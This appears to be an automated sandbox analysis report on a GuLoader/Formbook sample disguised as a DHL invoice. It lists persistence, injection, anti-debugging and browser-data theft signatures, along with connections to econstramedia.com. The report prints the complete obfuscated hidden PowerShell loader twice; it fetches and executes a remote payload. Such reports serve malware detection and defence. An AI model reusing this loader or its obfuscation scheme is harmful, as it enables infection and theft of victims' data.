Analysis Overview
SHA256
8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0
Threat Level: Known bad
The file 12072024_0934_11072024_DHL Invoice.rar was found to be: Known bad.
Malicious Activity Summary
Formbook
Guloader,Cloudeye
Formbook payload
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-12 09:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-12 09:34
Reported
2024-07-12 09:36
Platform
win7-20240704-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | econstramedia.com | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
Files
memory/2496-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp
memory/2496-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2496-6-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/2496-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-13-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp
memory/2496-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-12 09:34
Reported
2024-07-12 09:36
Platform
win10v2004-20240709-en
Max time kernel
147s
Max time network
143s
Command Line
Signatures
Formbook
Guloader,Cloudeye
Formbook payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\X8AP1N18K8P = "C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1984 set thread context of 2240 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 2240 set thread context of 3428 | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Windows\Explorer.EXE |
| PID 3244 set thread context of 3428 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] 